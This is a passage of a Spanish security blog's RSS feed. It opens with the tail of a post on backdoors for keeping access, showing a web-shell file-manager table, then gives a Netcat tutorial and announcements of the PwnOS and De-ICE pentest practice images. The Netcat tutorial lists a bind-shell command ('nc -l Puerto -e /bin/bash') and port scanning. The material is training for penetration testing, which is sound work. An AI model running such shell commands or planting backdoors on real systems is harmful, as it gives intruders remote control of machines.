<td width="75" height="28" align="center">#                 <span style="color: #999999; font-size: x-small;"><strong>Chmod</strong></span></td>
<td height="28" align="center"><span style="color: #ff0000; font-size: x-small;"><strong>Delete</strong></span></td>
</tr>
<tr>
<th width="250" height="22" align="left"><span style="text-decoration: none;"><span style="color: #666666; font-size: x-small;"> . <span style="color: #ff0000; font-size: xx-small;">dir</span></span></span></th>
<td width="113" align="center"><span style="color: #000080; font-size: x-small;"><strong> # </strong></span></td>
<td width="103" align="center">#</td>
<td width="77" align="center">#</td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #999999; font-size: x-small;">Chmod</span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #ff0000; font-size: x-small;">Delete</span></span></td>
</tr>
<tr>
<th width="250" height="22" align="left"><span style="text-decoration: none;"><span style="color: #666666; font-size: x-small;"> .. <span style="color: #ff0000; font-size: xx-small;">dir</span></span></span></th>
<td width="113" align="center"><span style="color: #000080; font-size: x-small;"><strong> # </strong></span></td>
<td width="103" align="center">#</td>
<td width="77" align="center">#</td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #999999; font-size: x-small;">Chmod</span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #ff0000; font-size: x-small;">Delete</span></span></td>
</tr>
<tr>
<th width="250" height="22" align="left"><span style="color: #666666; font-size: x-small;"> infosys.php </span></th>
<td width="113" align="center"><span style="color: #000080; font-size: x-small;"><strong>62 # </strong></span></td>
<td width="103" align="center"><span style="text-decoration: none;"><span style="color: #006600; font-size: x-small;">download # </span></span></td>
<td width="77" align="center"><span style="text-decoration: none;"><span style="color: #ff9933; font-size: x-small;">Edit # </span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #999999; font-size: x-small;">Chmod</span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #ff0000; font-size: x-small;">Delete</span></span></td>
</tr>
<tr>
<th width="250" height="22" align="left"><span style="color: #666666; font-size: x-small;"> level.php </span></th>
<td width="113" align="center"><span style="color: #000080; font-size: x-small;"><strong>2 # </strong></span></td>
<td width="103" align="center"><span style="text-decoration: none;"><span style="color: #006600; font-size: x-small;">download # </span></span></td>
<td width="77" align="center"><span style="text-decoration: none;"><span style="color: #ff9933; font-size: x-small;">Edit # </span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #999999; font-size: x-small;">Chmod</span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #ff0000; font-size: x-small;">Delete</span></span></td>
</tr>
<tr>
<th width="250" height="22" align="left"><span style="color: #666666; font-size: x-small;"> index2.php </span></th>
<td width="113" align="center"><span style="color: #000080; font-size: x-small;"><strong>3 # </strong></span></td>
<td width="103" align="center"><span style="text-decoration: none;"><span style="color: #006600; font-size: x-small;">download # </span></span></td>
<td width="77" align="center"><span style="text-decoration: none;"><span style="color: #ff9933; font-size: x-small;">Edit # </span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #999999; font-size: x-small;">Chmod</span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #ff0000; font-size: x-small;">Delete</span></span></td>
</tr>
<tr>
<th width="250" height="22" align="left"><span style="color: #666666; font-size: x-small;"> index.php </span></th>
<td width="113" align="center"><span style="color: #000080; font-size: x-small;"><strong>2 # </strong></span></td>
<td width="103" align="center"><span style="text-decoration: none;"><span style="color: #006600; font-size: x-small;">download # </span></span></td>
<td width="77" align="center"><span style="text-decoration: none;"><span style="color: #ff9933; font-size: x-small;">Edit # </span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #999999; font-size: x-small;">Chmod</span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #ff0000; font-size: x-small;">Delete</span></span></td>
</tr>
<tr>
<th width="250" height="22" align="left"><span style="color: #666666; font-size: x-small;"> copyright.txt </span></th>
<td width="113" align="center"><span style="color: #000080; font-size: x-small;"><strong>15 # </strong></span></td>
<td width="103" align="center"><span style="text-decoration: none;"><span style="color: #006600; font-size: x-small;">download # </span></span></td>
<td width="77" align="center"><span style="text-decoration: none;"><span style="color: #ff9933; font-size: x-small;">Edit # </span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #999999; font-size: x-small;">Chmod</span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #ff0000; font-size: x-small;">Delete</span></span></td>
</tr>
<tr>
<th width="250" height="22" align="left"><span style="color: #666666; font-size: x-small;"> background.jpg </span></th>
<td width="113" align="center"><span style="color: #000080; font-size: x-small;"><strong>41 # </strong></span></td>
<td width="103" align="center"><span style="text-decoration: none;"><span style="color: #006600; font-size: x-small;">download # </span></span></td>
<td width="77" align="center"><span style="text-decoration: none;"><span style="color: #ff9933; font-size: x-small;">Edit # </span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #999999; font-size: x-small;">Chmod</span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #ff0000; font-size: x-small;">Delete</span></span></td>
</tr>
<tr>
<th width="250" height="22" align="left"><span style="color: #666666; font-size: x-small;"> info.php </span></th>
<td width="113" align="center"><span style="color: #000080; font-size: x-small;"><strong>0 # </strong></span></td>
<td width="103" align="center"><span style="text-decoration: none;"><span style="color: #006600; font-size: x-small;">download # </span></span></td>
<td width="77" align="center"><span style="text-decoration: none;"><span style="color: #ff9933; font-size: x-small;">Edit # </span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #999999; font-size: x-small;">Chmod</span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #ff0000; font-size: x-small;">Delete</span></span></td>
</tr>
</tbody>
</table>
<p style="text-align: justify;">etc&#8230;</p>
<p style="text-align: justify;">Vuelvo y reitero la invitación a que los lectores compartan sus métodos para habilitar puertas traseras en sistemas.</p>
<p style="text-align: justify;">En futuros entornos conoceremos algunos métodos aún más avanzados que los presentados en este post realizado a modo de introducción a los Backdoors.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/desarrollo-del-entorno-de-ice-nivel-i-%e2%80%93-backdoors-manteniendo-el-acceso/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Video Tutorial Netcat en BackTrack</title>
		<link>http://www.sec-track.com/video-tutorial-netcat-en-backtrack</link>
		<comments>http://www.sec-track.com/video-tutorial-netcat-en-backtrack#comments</comments>
		<pubDate>Wed, 28 Oct 2009 04:32:15 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Tools]]></category>
		<category><![CDATA[Videos]]></category>
		<category><![CDATA[Hacking Tools]]></category>
		<category><![CDATA[Netcat]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=211</guid>
		<description><![CDATA[Corto video tutorial introductorio al uso de la herramienta Netcat conocida como la navaja suiza de los protocolos TCP/IP bajo la distribución GNU/Linux BackTrack. En este video tutorial veremos algunos de los usos más comunes de Netcat: Ayuda de Netcat: nc -h Banner idetification: nc -v IP puerto Peticiones con Netcat / Telnet &#62; Diferencias: [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Corto video tutorial introductorio al uso de la herramienta Netcat conocida como la navaja suiza de los protocolos TCP/IP bajo la distribución GNU/Linux BackTrack.</p>
<p style="text-align: justify;">En este video tutorial veremos algunos de los usos más comunes de Netcat:</p>
<p style="text-align: justify;"><strong>Ayuda de Netcat:</strong></p>
<ul>
<li>nc -h</li>
</ul>
<p style="text-align: justify;"><strong>Banner idetification:</strong></p>
<ul>
<li>nc -v IP puerto</li>
</ul>
<p style="text-align: justify;"><strong>Peticiones con Netcat / Telnet &gt; Diferencias:</strong></p>
<ul>
<li>nc -v IP 80 &lt; /ruta/file.txt</li>
</ul>
<p style="text-align: justify;"><strong>Netcat en modo escucha y ejecución de shell:</strong></p>
<ul>
<li>nc -l Puerto -e /bin/bash</li>
</ul>
<p style="text-align: justify;"><strong>Netcat como scanner de puertos:</strong></p>
<ul>
<li>nc -z -v IP rango-puertos</li>
</ul>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="400" height="300" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://vimeo.com/moogaloop.swf?clip_id=7301816&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" /><embed type="application/x-shockwave-flash" width="400" height="300" src="http://vimeo.com/moogaloop.swf?clip_id=7301816&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p><a href="http://vimeo.com/7301816">Video tutorial NetCat en BackTrack</a> from <a href="http://vimeo.com/user2489751">Sec-Track</a> on <a href="http://vimeo.com">Vimeo</a>.</p>
<p style="text-align: justify;"><a href="http://netcat.sourceforge.net/" target="_blank"><strong>Más información sobre Netcat &gt;&gt;</strong></a></p>
<p style="text-align: justify;"><a href="http://crysol.org/node/28" target="_blank"><strong>Netcat, la navaja suiza de TCP/IP &gt;&gt;</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/video-tutorial-netcat-en-backtrack/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PwnOS</title>
		<link>http://www.sec-track.com/pwnos</link>
		<comments>http://www.sec-track.com/pwnos#comments</comments>
		<pubDate>Wed, 07 Oct 2009 23:42:54 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Exploits]]></category>
		<category><![CDATA[Medusa]]></category>
		<category><![CDATA[Nessus]]></category>
		<category><![CDATA[Netcat]]></category>
		<category><![CDATA[NetDiscover]]></category>
		<category><![CDATA[Network Mapping]]></category>
		<category><![CDATA[Nmap]]></category>
		<category><![CDATA[OSSTMM]]></category>
		<category><![CDATA[Penetration Test]]></category>
		<category><![CDATA[Port Scanning]]></category>
		<category><![CDATA[VMWare]]></category>
		<category><![CDATA[Vulnerability Scanning]]></category>
		<category><![CDATA[Xhydra]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=16</guid>
		<description><![CDATA[Escenario: Un empresa dedicada al servicio de Webhosting te contrata para realizar un Test de Penetración en uno de sus servidores dedicados a la administración de sus sistemas. Dicho servidor se encuentra en una de sus redes xxx.xxx.xxx.xxx. El objetivo consiste en identificar dicho servidor, descubrir y analizar las vulnerabilidades existentes en el mismo y [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><strong>Escenario:</strong> Un empresa dedicada al servicio de Webhosting te contrata para realizar un Test de Penetración en uno de sus servidores dedicados a la administración de sus sistemas.<br />
Dicho servidor se encuentra en una de sus redes xxx.xxx.xxx.xxx.</p>
<p style="text-align: justify;">El objetivo consiste en identificar dicho servidor, descubrir y analizar las vulnerabilidades existentes en el mismo y penetrar el sistema.</p>
<p style="text-align: justify;"><strong>Categoría:</strong> Fundamentación, Test de Penetración, Explotación de vulnerabilidades.</p>
<p style="text-align: justify;"><strong>Nivel de Dificultad:</strong> Medio / Alto</p>
<p style="text-align: justify;"><strong>Formato:</strong> Imágen VMWare</p>
<p style="text-align: justify;"><strong>Objetivos/Técnicas: </strong>Mapeo de Red / O.S Fingerprint / Escaneo de Puertos / Identificación de Servicios / Escaneo de Vulnerabilidades / Identificación y Análisis de Vulnerabilidades / Explotación de Vulnerabilidades / Escalada de Privilegios / Extracción de Informacion Confidencial.</p>
<p style="text-align: justify;"><strong>Herramientas/Recursos: <a href="http://www.isecom.org/osstmm/" target="_blank">OSSTMM</a></strong></p>
<p style="text-align: justify;"><strong>Configuracion:</strong> El router/tarjeta de red virtual/fisica debe tener DHCP activo.</p>
<p style="text-align: justify;"><strong>Descargar (<a href="http://www.adrive.com/public/0da911443f10d5bdcc9d35644f9c2b935df9d2e8823b02597661731be1622991.html" target="_blank">Imágen VMWare</a>)<br />
</strong></p>
<p style="text-align: justify;"><strong>MD5:</strong></p>
<p style="text-align: justify;"><strong>Autor / Página Oficial / Más Información:</strong> <a href="http://www.0dayclub.com" target="_blank">www.0dayclub.com</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/pwnos/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>De-ICE PenTest LiveCDs (Nivel I)</title>
		<link>http://www.sec-track.com/de-ice-pentest-livecds-nivel-i</link>
		<comments>http://www.sec-track.com/de-ice-pentest-livecds-nivel-i#comments</comments>
		<pubDate>Wed, 07 Oct 2009 23:39:18 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Medusa]]></category>
		<category><![CDATA[Nessus]]></category>
		<category><![CDATA[Netcat]]></category>
		<category><![CDATA[NetDiscover]]></category>
		<category><![CDATA[Network Mapping]]></category>
		<category><![CDATA[Nmap]]></category>
		<category><![CDATA[OSSTMM]]></category>
		<category><![CDATA[Penetration Test]]></category>
		<category><![CDATA[Port Scanning]]></category>
		<category><![CDATA[VMWare]]></category>
		<category><![CDATA[Vulnerability Scanning]]></category>
		<category><![CDATA[Xhydra]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=9</guid>
		<description><![CDATA[Escenario: Un CEO de una pequeña empresa que ha sido presionado por el Comité Administrativo para ser objeto de un Test de Penetración a realizarse desde la empresa. El Director General afirma que su empresa es segura, cree además de que este Test de Penetración será un enorme desperdicio de dinero, sobre todo porque ya tiene una solución de exploración (escaneo) de vulnerabilidades (Nessus).]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><strong>Escenario:</strong> Un CEO de una pequeña empresa que ha sido presionado por el Comité Administrativo para ser objeto de un Test de Penetración a realizarse desde la empresa. El Director General afirma que su empresa es segura, cree además de que este Test de Penetración será un enorme desperdicio de dinero, sobre todo porque ya tiene una solución de exploración (escaneo) de vulnerabilidades (Nessus).<br />
Para hacer “felices” a los del Comité Administrativo, él decide contratarlo a usted y le da un plazo de 5 días para realizar el trabajo, pues como se mencionó él no cree que la empresa sea vulnerable a cualquier intento de acceso no autorizado.<br />
Su tarea es analizar solo un servidor en el cual se aloja una página Web que ofrece información de contacto de la misma.</p>
<p>El Director General espera que usted intente con todos los tipos de ataques que estén a su disposición, pues está seguro de que usted no podrá vulnerar el sistema y obtener acceso.</p>
<p style="text-align: justify;"><strong>Categoría:</strong> Fundamentación, Test de Penetración</p>
<p style="text-align: justify;"><strong>Nivel de Dificultad:</strong> Bajo</p>
<p style="text-align: justify;"><strong>Formato:</strong> .ISO / Imágen VMWare</p>
<p style="text-align: justify;"><strong>Objetivos/Técnicas: </strong>Mapeo de Red / O.S Fingerprint / Escaneo de Puertos / Identificación de Servicios / Escaneo de Vulnerabilidades / Identificación y Análisis de Vulnerabilidades / Explotación de Vulnerabilidades / Escalada de Privilegios / Extracción de Información Confidencial.</p>
<p style="text-align: justify;"><strong>Herramientas/Recursos: <a href="http://www.isecom.org/osstmm/" target="_blank">OSSTMM</a></strong> / <strong><a href="http://nmap.org/" target="_blank">Nmap</a></strong> /<strong><a href="http://freeworld.thc.org/" target="_blank"> Xhydra</a></strong> / <strong><a href="http://netcat.sourceforge.net/" target="_blank">Netcat</a></strong> / <strong><a href="http://www.foofus.net/jmk/medusa/medusa.html" target="_blank">Medusa</a></strong> / <strong><a href="http://netdiscover.sourceforge.net/" target="_blank">NetDiscover</a></strong> / <strong><a href="http://www.nessus.org/" target="_blank">Nessus</a></strong></p>
<p style="text-align: justify;"><strong>Configuracion:</strong> Este entorno esta configurado para que de manera automática obtenga la dirección IP  192.168.1.100. El router/tarjeta de red virtual/física debe tener DHCP activo, la dirección de inicio debe ser 192.168.1.2 y la máscara de subred 255.255.255.0</p>
<p style="text-align: justify;"><strong>Descargar (<a href="http://www.adrive.com/public/d5dc5d5dd7eec2d5ee6051d3d5ab235f5c8273357169e8dd6b01069fc5e4c51f.html" target="_blank">ISO</a>)<br />
</strong></p>
<p style="text-align: justify;"><strong>MD5:</strong> a3341316ca9860b3a0acb06bdc58bbc1</p>
<p style="text-align: justify;"><strong>Autor / Página Oficial / Mas Información:</strong> <strong><a href="http://www.heorot.net" target="_blank">www.Heorot.net</a></strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/de-ice-pentest-livecds-nivel-i/feed</wfw:commentRss>
		<slash:comments>18</slash:comments>
		</item>
	</channel>
</rss>

<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Served from: www.sec-track.com @ 2012-02-05 13:50:14 -->
